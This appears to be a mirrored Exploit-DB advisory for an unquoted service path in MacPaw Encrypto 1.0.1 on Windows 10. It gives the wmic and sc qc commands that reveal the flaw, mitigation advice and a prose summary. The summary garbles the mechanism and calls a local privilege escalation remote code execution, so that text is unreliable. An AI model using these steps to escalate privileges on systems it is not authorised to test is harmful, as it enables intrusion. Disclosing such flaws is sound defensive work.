header-logo
Suggest Exploit
vendor:
Encrypto
by:
Ismael Nava
6.2
CVSS
MEDIUM
Unquoted Service Path
428
CWE
Product Name: Encrypto
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 64-bit
2020

MacPaw Encrypto 1.0.1 – ‘Encrypto Service’ Unquoted Service Path

The MacPaw Encrypto version 1.0.1 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to escalate privileges by placing a malicious executable in a higher privileged directory with the same name as the service executable. When the service is started, the malicious executable will be executed instead. This can lead to remote code execution or other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of MacPaw Encrypto or ensure that the service path is quoted correctly. Additionally, users should regularly update their operating systems and use strong passwords for their user accounts.
Source

Exploit-DB raw data:

# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 03-19-2020
# Vendor Homepage: https://macpaw.com/encrypto
# Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092
# Tested Version: 1.0.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Encrypto Service   Encrypto.Service    C:\Program Files\Encrypto\Encrypto.Service.exe   Auto


C:\>sc qc "Encrypto.Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Encrypto.Service
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START  (DELAYED)
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Encrypto Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

Navigation

Suggest Exploit

Services By CQR